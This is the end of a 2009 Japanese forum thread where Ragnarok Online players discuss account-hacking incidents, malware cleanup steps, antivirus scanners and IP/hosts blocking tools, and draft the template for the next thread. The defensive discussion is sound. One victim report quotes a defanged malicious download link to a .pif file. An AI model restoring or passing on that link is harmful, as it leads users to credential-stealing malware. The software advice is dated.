 パスワード変更の必要なし。

>>実行してしまったならアウト
>何をしたら実行になりますか?

ごめん、そこが理解できないようでは安全かどうか、ネットワーク越しには判断できない。黙ってOSの再インストールしてきてくれ。 <> (○口○*)さん<>sage<>09/10/28 09:32 ID:TWO+tI740<> >>971
Avastが対応しているものではあり、多分、ファイルを落とした時点で検知してるとは思いますが
実際に動作させて、PCに変更が加えられた後で検知した可能性もありますので、安全とは言い切れません。
安全である保証ができませんので、勉強になったと思って、OS再インストールを。

ファイルを実行したのかしてないのかわからないような人に、OS入れ直し以外の手法を勧めることはできません。

メールの設定、ブラウザのブックマーク、IMEの学習済み辞書、ROのエンブレムやSSのフォルダなどをバックアップして
それからOSを入れなおしてください。

OS再インストール後は、Peer Block で危険IPをブロックする設定にしておきましょう。 <> (○口○*)さん<>sage<>09/10/28 11:24 ID:8i12Dmox0<> >>967
削除依頼出した? <> (○口○*)さん<>sage<>09/10/28 13:03 ID:WxytTeLi0<> スレ建てラインを越えたけど、ちょっと提案。
現在、総合案内は>>1、報告者用テンプレは>>4となっているけど、テンプレは>>2に繰り上げて
連続性を保った方が良い希ガス。
慌てている時に、飛び石の配置だと見落とす可能性がどうしても高くなるので。
それと合わせて、現行の>>2-3>>3-4にすれば、>>3-7が全て事前対策となるのですっきりするかな。

↓上記を踏まえた>>1の変更案。

■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

!! 報告及び質問の前には、注意点 (>>2)を必ず読んでください !!
!! これを怠ると投稿が削除対象となる可能性があります !!

・ 報告用&質問用テンプレ (>>2)
・ 対策の参考情報アドレス (>>3)
・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>4)
・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
・ その他関連(>>7)


■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立ては>>970がしてください。反応がなければ以降10ごとに。


【過去スレ】
・アカウントハック対策・セキュリティ 総合スレ Lv.3 ttp://enif.mmobbs.com/test/read.cgi/livero/1227396646/
・アカウントハック対策・セキュリティ 総合スレ Lv.2 ttp://enif.mmobbs.com/test/read.cgi/livero/1220220582/
・アカウントハック対策・セキュリティ 総合スレ ttp://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(ttp://rosafe.rowiki.jp/)へ <> (○口○*)さん<>sage<>09/10/28 13:04 ID:WxytTeLi0<> 現スレ追加忘れてた、そこだけ修正。
【過去スレ】
・アカウントハック対策・セキュリティ 総合スレ Lv.4 ttp://enif.mmobbs.com/test/read.cgi/livero/1242218790/
・アカウントハック対策・セキュリティ 総合スレ Lv.3 ttp://enif.mmobbs.com/test/read.cgi/livero/1227396646/
・アカウントハック対策・セキュリティ 総合スレ Lv.2 ttp://enif.mmobbs.com/test/read.cgi/livero/1220220582/
・アカウントハック対策・セキュリティ 総合スレ ttp://enif.mmobbs.com/test/read.cgi/livero/1213363112/ <> 夢 ★<>sage<>09/10/28 16:19 ID:???0<> 削除するので念のため退避しておきます

【      気付いた日時          】 昨日の27日23時
【不審なアドレスのクリックの有無 】  【RO】プラチナ盾発動率検証【画質テスト】http://aimeblog■com/play/mober_v0■5fis■pif
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (Yes)
【    ツールの使用の有無      】 (No)
【  ネットカフェの利用の有無    】 (Yes)
【     OS    】 Vista SP2
【使用ブラウザ 】 Lunascape5
【WindowsUpdateの有無】 先週?
【 アンチウイルスソフト 】 Avast
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 踏んだときはトロイの木馬がでましたが、スキャン後は何もでませんでした
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】今のところ被害はありません

スキャンでなにもでなくてもOS再インストールは決定ですか?
あとROのパスだけではなく、ネットバンクのパスや他のサイトのパスも抜かれるものですか? <> (○口○*)さん<>sage<>09/10/28 17:18 ID:qXpuJHKj0<> Firefox v3.5.4/v3.0.15公開
ttp://www.forest.impress.co.jp/docs/news/20091028_324795.html <> (○口○*)さん<>sage<>09/10/28 17:59 ID:TWO+tI740<> >>975
テンプレ移動はすっきりしていいね。賛成。

P2Gまわりの修正は1コメントに入りきるかどうか…何行までだったかなぁ。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/10/28 19:33 ID:mNiUuoSS0<> 自分の環境だと現在niftyのオンラインスキャンでは
アップデートエラーが出たりします。
なにげに日本の公式でも現在サービスが利用できないみたいです。
試供版を使うか、他のウイルススキャンを使うかと言った所かも。

オンラインスキャンに限って言えば
カスペが利用できない場合用に何かあったほうがいいのかなあとか…。 <> (○口○*)さん<>sage<>09/10/28 23:05 ID:8i12Dmox0<> プロテクト センター - Windows Live OneCare PC セーフティ
ttp://onecare.live.com/site/ja-jp/center/howsafe.htm

無料ウイルス診断 フリースキャン | マカフィー株式会社
ttp://www.mcafee.com/japan/mcafee/home/freescan.asp

Security Check(シマンテック)
ttp://www.symantec.co.jp/region/jp/securitycheck/ <> (○口○*)さん<>sage<>09/10/29 09:01 ID:4oCvxdmN0<> 3件の脆弱性を解決、Opera 10.01公開

ttp://www.itmedia.co.jp/enterprise/articles/0910/29/news018.html <> (○口○*)さん<>sage<>09/10/29 11:07 ID:P6XzllHE0<>
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

!! 報告及び質問の前には、注意点 (>>2)を必ず読んでください !!
!! これを怠ると投稿が削除対象となる可能性があります !!

・ 報告用&質問用テンプレ (>>2)
・ 対策の参考情報アドレス (>>3)
・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>4)
・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
・ その他関連(>>7)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立ては>>970がしてください。反応がなければ以降10ごとに。

【過去スレ】
【過去スレ】
・アカウントハック対策・セキュリティ 総合スレ Lv.4 ttp://enif.mmobbs.com/test/read.cgi/livero/1242218790/
・アカウントハック対策・セキュリティ 総合スレ Lv.3 ttp://enif.mmobbs.com/test/read.cgi/livero/1227396646/
・アカウントハック対策・セキュリティ 総合スレ Lv.2 ttp://enif.mmobbs.com/test/read.cgi/livero/1220220582/
・アカウントハック対策・セキュリティ 総合スレ ttp://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(ttp://rosafe.rowiki.jp/)へ <> (○口○*)さん<>sage<>09/10/29 11:07 ID:P6XzllHE0<> 【投稿/相談/報告する際の注意点】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。
 提供した情報の量と質に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

 ----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (Windowsのバージョン、ServicePack等まで書く)
【使用ブラウザ 】 (InternetExplorerなど、バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hostsファイルの変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2の導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】 (被害状況をできるかぎり詳しく書く) <> (○口○*)さん<>sage<>09/10/29 11:08 ID:P6XzllHE0<> 【対策の参考情報アドレス】
・アカウントハッキングについて > 被害にあってしまったら(RO公式)
  ttp://www.ragnarokonline.jp/playguide/hacking/

・ROセキュリティWiki
  ttp://rosafe.rowiki.jp/
・ROアカウントハック報告スレのまとめサイト
  ttp://sky.geocities.jp/vs_ro_hack/
・ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト(臨時)
  ttp://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより アカウントハッキング対策についての情報まとめ)
  ttp://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
  ttp://lineage.paix.jp/
・FFXI(仮)
  ttp://ilion.blog.shinobi.jp/
・Alchemist service アカウントハック体験談
  ttp://air1.fc2web.com/as/id.html
・So-net セキュリティ通信
  ttp://www.so-net.ne.jp/security/
・セキュリティホール memo
  ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/
・Adobe Flash Playerの脆弱性および XREA広告サーバハッキング問題
  ttp://www.geocities.jp/ff11warning/content5/content5_xrea.html

※ 素人の検体の確保は大変危険です。手順を理解し安全に出来る人だけがしてください ※

・アンチウィルスメーカー各社検体提出先
  ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8
・VirusTotal
  ttp://www.virustotal.com/jp/
・VirSCAN.org
  ttp://virscan.org/ <> (○口○*)さん<>sage<>09/10/29 11:08 ID:P6XzllHE0<> 【このスレでよく出てくるアプリケーション】
・PeerGuardian2 (PG2と略される。下記は対策スレのまとめサイトの簡単な手引き)
  ttp://sky.geocities.jp/vs_ro_hack/pg2.htm
  ・【PeerGuardian2 暫定ダウンロード先】
   現在本家から落とせないので、キャッシュを利用してください。下から7番目。
   ttp://web.archive.org/web/20080209171747/http://www.dukedog.flnet.org/trans.html
   文字化けして読めないと思いますが、こう書いてあります。
   必要な物をダウンロードしましょう。
     >PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用 / 98・ME用 / ソースコード
     >PeerGuardian Lite (β050422) 日本語版 / ソースコード
  ・本家の英語版 ttp://phoenixlabs.org/pg2/
  ファイル情報
     pg2-050918-nt-jp.exe 1.34 MB (1,412,454 バイト)
     CBC9280A
     C55F4B13B568927B58965B93987CBE17
  ・【PG2導入の手引き】
   ttp://ff11.my-sv.net/pg2/install.html
     Vistaの場合は、PeerGuardian 2 RC1 Test を、フォーラム(登録が必要)にある
     ローダー経由で実行しないと、動作を開始しませんのでご注意ください。
・Peer Block(Vista/Win7の場合はこちらを利用してください)
  ttp://www.peerblock.com/
  ・Peer BlockをVista/Win7の起動時から管理者権限で起動するのに使える方法。
   ttp://www.blackcatlab.com/article.php/090804_SendKeys_under_UAC

【URLが危険か判断できない際に使われるサイト】
・ソースチェッカーオンライン (ソースや隠れたインラインフレームの転送先を確認できる)
 ttp://so.7walker.net/guide.php −−−2009/12/20運用終了予定
・aguse.jp (ゲートウェイからスクリーンショットした画面を見ることが出来る)
 ttp://www.aguse.jp/
 ここで安全と表示された場合でも、鵜呑みにして信用しないように。

【PCにウィルス対策ソフトを導入してない方へ ネットから出来るオンラインスキャン】
・Kaspersky Internet Security 試用版
  ttp://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
  ttp://www.kaspersky.co.jp/virusscanner
  ttp://www.kaspersky.com/virusscanner
  ttp://www.nifty.com/security/vcheck/kav/kavwebscan.html
・Windows Live OneCare PC セーフティ
  ttp://onecare.live.com/site/ja-jp/center/howsafe.htm <> (○口○*)さん<>sage<>09/10/29 11:23 ID:P6XzllHE0<> 【入らなかった…】 Symantecとマカフィーも入れる?

・BitDefender オンラインスキャン
  ttp://www.bitdefender.com/scanner/online/free.html
・F-Secure オンラインスキャナ
  ttp://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/online-scanner/index.html
・Panda ActiveScan2.0
  ttp://www.ps-japan.co.jp/homeuser/content0001.html
・ウイルスチェイサー for WEB(Dr.Webエンジン)
  ttp://www.viruschaser.jp/support_online.html <> (○口○*)さん<>sage<>09/10/29 11:24 ID:P6XzllHE0<> 【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

 ・アドレスをホイホイ踏まない。よく確認する。(IP直書きの数字のアドレスなど)
 ・特に掲示板等に貼られた拡張子まで書いてあるURL(.src exe 等)は絶対にクリックしない。
 ・出所の怪しいプログラムやスクリプトを実行しない。
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う。
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う。
 ・パーソナルファイアウォールソフトの導入する。
   ・hostsの利用した危険ドメインのブロック
   ・PeerGuardian2を使った危険IPのブロック など
  (※hostsは定期的な更新が必要です。更新をサボりがちな人はhostsファイル更新スクリプト
    (ttp://acopri.rowiki.jp/index.php?hostsRenewScript)の導入も視野にいれましょう)
 ・通常のネット閲覧はIEの使用を止め、他のブラウザに乗り換える(Firefox、Opera等)
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE6SP2以降。IE6SP1以前では設定出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする <> (○口○*)さん<>sage<>09/10/29 11:24 ID:P6XzllHE0<> 【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は関連サイトをご覧下さい。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードをすべて変更
 3)必要最低限のデータをバックアップ
 4)ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う
 5)セキュリティソフトの導入
 6)OSのアップデート(前もってSP+メーカーを利用すると安全にアップデートを行う事が出来ます)
 7)安全な環境になったらバックアップしたデータの書き戻し

注)
 ・安全が確認されるまで感染したPCからはNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・当然パスワード入力を伴う行動や各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『ガンホーID(旧GungHo-ID)パスワード』『キャラパスワード』『メールアドレス』
  『ガンホーID変更』(ID自体の変更)は一度に限り行える。
 ・アンチウイルスソフトの過信は禁物。
  自信がなければクリーンインストール、PCの再セットアップを第1選択肢とする事。
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる。
 ・大事なデータはバックアップは取っておくこと。(常日頃からしておくと楽)


● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや携帯電話・据置型ゲーム機・1CD Linux等が挙げられます。
・『安全ではない環境』ってどんな物?
  インターネットカフェ等、不特定多数が使用する環境。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
・知り合いに頼んでパスワード変更してもらうのはダメ?
  いくら信頼できる友人でもパスワードを教えるのは良く有りませんし、その友人がウィルスに感染してないとも限りません。
  知り合いに頼むのは最後の手段であり、安全な環境が構築出来次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使ったアンチウィルスソフトでは発見出来なかっただけです。
  安全かどうか自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです。 <> (○口○*)さん<>sage<>09/10/29 11:24 ID:P6XzllHE0<> 【クリーンインストール・リカバリ・PCの再セットアップの時に便利なツール】
・SP+メーカー (最新の Service Pack を適用させたインストールCDを作成するツール)
  ttp://www.ak-office.jp/
   ・SP+メーカーのFAQ書庫(有志がまとめたWiki形式のページで上記ツールのFAQ)
     ttp://wikiwiki.jp/faqwinsppm/

【短縮アドレスについて】
Q.TinyURLの短縮アドレスが怖くて開けない。クリックする前にどんなページか分からない?
 ttp://www.oshiete-kun.net/archives/2008/07/tinyurl.html
A.設定変更で直接飛ばないようにするか、チェック用のブックマークレットを使うのがオススメ
>実は、TinyURLは、ユーザー側で設定を変えておくと、短縮済みURL→実URLの間に、2ちゃんねるの「ime.nu」のような
>中継ページを挟ませることができる。その分毎回クリックの手間が増えるわけだが、怪しげなサイト・掲示板などに行く機会が
>多い人は設定を変えておくと良いだろう。また、「ブックマークレット」という仕組みを使うと、TinyURLのリンクをブラウザ操作で
>実URLに書き換えることも可能だ。Firefoxユーザーなら、同じような書き換えを自動で行うグリースモンキースクリプトも利用できるぞ。

注)TinyURLの補足
短縮URLのアクセスに対しクッションページを設定できるので、有効化しておくことを強く推奨。
tinyurl■com/preview.php
enable previewsを選択することで、設定内容がcookieに保存される。
使用しているブラウザごとに実行する必要があるが、有効期限は取得時刻+10年
  補足:まとめ臨時サイトのhostsリストではtinyurl■com自体をリストに加えていますので、
     利用する場合は一旦上記ドメインを編集してリストから削除して実行する必要があります。
     (ただし、tinyurl自体規制しているので意味が無いかもしれない。)

【AntiVir等の誤検出の提出先】
analysis.avira.com/samples/
のFile typeをFalse Positiveにして下に説明を書いて提出。(@は全角)
ALWIL Software(avast!) <virus@avast.com>
Avira GmbH(AntiVir) <virus@avira.com>
 注:他はROセキュリティWikiのアンチウィルスメーカー各社検体提出先にまとめてあります。
   ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

【ウイルスの予備知識】
・検証ラボ:ウイルスを観察してみる
 ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080402/297763/ <> (○口○*)さん<>sage<>09/10/29 11:32 ID:P6XzllHE0<> >>テンプレ投入先未定
・都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
#RO公式のアカハック対策からも飛べるけど、スレ内でアンカーを張って示したい時用。
・DriveImage XML Backup Software - Data Recovery Product
ttp://www.runtime.org/driveimage-xml.htm
#フリーで多機能なHDDイメージ取得ソフト。使い方は ttp://pnpk.net/cms/archives/137 などを参考に。


便利そうなものの紹介。

CDブートで利用できる無償のマルウェア検査・駆除ソフト(Dr.WEB LiveCD)
ttp://internet.watch.impress.co.jp/cda/news/2008/11/26/21647.html
ttp://drweb.jp/support/LiveCD.html

BitDefender レスキューCD
ttp://download.bitdefender.com/rescue_cd/

Avira rescue CD
ttp://www.avira.com/en/company_news/rescue_cd_.html

USBワーム対策とスキャン軽量化「ESET Smart Security V4.0」
ttp://internet.watch.impress.co.jp/cda/news/2009/05/12/23400.html
ttp://www.the-hikaku.com/security/ESET/ESET_v4-1.html
ESETにもレスキューCDができるらしい。

F-Secure レスキューCD
ttp://www.f-secure.com/ja_JP/security/security-lab/tools-and-services/rescue-cd/index.html

−−−−−
以上、スレ立て規制で立てれなかったので、どなたかお願いします。 <> (○口○*)さん<>sage<>09/10/29 13:31 ID:xtpc93KC0<> >>990
コピペしただけなのはわかるけど、なぜ伏せる
無闇に伏せるのは「オオカミが来たぞ」と言ってるようなもん <> (○口○*)さん<>sage<>09/10/29 14:26 ID:ZE9bsu/F0<> 何の話 <> (○口○*)さん<>sage<>09/10/30 06:17 ID:6UvgGtxJ0<> リンクがh抜きしてあるってことじゃない?
もっとも、セキュリティ関連スレでそのぜひを問うと意味が変わってくるけど・・・

あとオンラインスキャンだとノートンとバスターもあるけどこれらのアドレスも並記すべきだろうか?
定義ファイルの更新頻度とか、どこのオンラインスキャンが有利なのか?とか
そういう情報って探してもなかなか入手できないんだよなぁ・・・ <> (○口○*)さん<>sage<>09/10/30 07:06 ID:eT/8YCGE0<> tinyurl■comだろ

無闇に〜っていうと最近では未実装スレ他で張られたアドレスに
(そうではないのに)アカハックと一言だけレスつけるのとか居てうざいなーとは思ったっけ <> (○口○*)さん<>sage<>09/10/30 15:58 ID:Nt91rUwz0<> 嘘を嘘と見抜けないと難しい <> (○口○*)さん<>sage<>09/10/30 16:03 ID:OKbHXAgz0<> というか、992が理由を最後に書き加えて立てればよかったと思うんだが。 <> (○口○*)さん<>sage<>09/10/30 17:14 ID:Gvt4hU690<> 別に誰かが困る訳じゃないからこのままでいいべ <> (○口○*)さん<>sage<>09/10/30 17:19 ID:OKbHXAgz0<> ま、そのまま立ててくる <> (○口○*)さん<>sage<>09/10/30 17:45 ID:OKbHXAgz0<> アカウントハック対策・セキュリティ 総合スレ Lv.5
http://enif.mmobbs.com/test/read.cgi/livero/1256890835/ <> 1001<><>Over 1000 Thread<> このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。 <>